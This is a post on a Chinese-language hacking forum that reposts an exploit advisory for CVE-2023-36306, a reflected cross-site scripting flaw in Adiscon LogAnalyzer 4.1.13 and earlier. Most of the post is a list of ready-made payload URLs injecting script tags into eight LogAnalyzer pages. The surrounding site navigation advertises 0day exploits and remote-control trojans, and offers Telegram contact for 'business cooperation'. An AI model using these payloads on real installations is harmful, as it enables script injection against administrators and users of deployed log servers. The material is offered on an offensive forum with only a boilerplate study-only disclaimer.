[ 主页 ]  [ 隐私策略 ]  [ 0day ]  [ 业务合作 ]  [ 获得金币 ]  [ 项目开发 ]  [ 渗透 ]  [ 逆向破解 ]  [ faq ]  [ 联系我们 ]  [ 远控木马 ]  [ 合作方式 ]    用户: 39601     
Telegram联系我们
H

Adiscon Loganalyzer v.4.1.13-跨站点脚本

H

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: Adiscon Loganalyzer v.4.1.13-跨站点脚本
#日期: 2023.Aug.01
#利用作者: PEDRO(ISSDU TW)
#供应商homepage: https://loganalyzer.adiscon.com/
#软件link: https://loganalyzer.adiscon.com/download/
#版本: v4.1.13和之前
#在: Linux上测试
#CVE : CVE-2023-36306
有几种安装方法。
如果您没有数据库(基于文件)安装,则无需登录。
如果使用数据库安装,则应仅使用读取用户登录(至少)
XSS有效载荷低于:
XSS
http://[IP地址]/loganalyzer/askTheoracle.php?type=domainquery=uid=%22%3E%3E%3CScript%3ealert%28%27xs%27%29%3c/script%3e
http://[IP地址]/loganalyzer/chartgenerator.php?
http://[IP地址]/loganalyzer/details.php/%22%3e%3cscript%3ealert('XSS')%3C/script%3E
http://[IP地址]/loganalyzer/index.php/%22%3e%3cscript%3ealert('XSS')%3C/script%3E
http://[IP地址]/loganalyzer/search.php/%22%3e%3cscript%3ealert('XSS')%3C/script%3E
http://[IP地址]/loganalyzer/export.php/%22%3e%3cscript%3ealert('xss')%3C/script%3E
http://[IP地址]/loganalyzer/reports.php/%22%3e%3cscript%3ealert('XSS')%3C/script%3E
http://[IP地址]/loganalyzer/statistics.php/%22%3e%3cscript%3ealert('XSS')%3C/script%3E
 
H
WordPress插件忍者表格3.6.25-反射XSS
H
Reyeeos 1.204.1614- MITM远程代码执行(RCE)
点击展开...
好评 0 否决票
您必须登录或注册才可回复。

Partner Website 友情鏈接 : 臺灣駭客團隊論壇 全球最大的中文黑客论坛 한국 해커 팀 포럼 dark Web hacking team 骇客团队 HACKER.BZ UKhacker
暗网黑客论坛网站:声明,本网站的教程、文章、工具和其他相关内容仅供学习和研究使用,旨在提高公众的网络安全意识和防护能力。
我们强烈反对任何形式的非法活动,禁止未经授权的入侵、攻击、破坏他人的网络系统等行为。
Copyright © 2013-2025 HACK 您可以联系我们的Telegram进行业务合作: @HackAptTeam  网站地图Sitemap
后退
顶部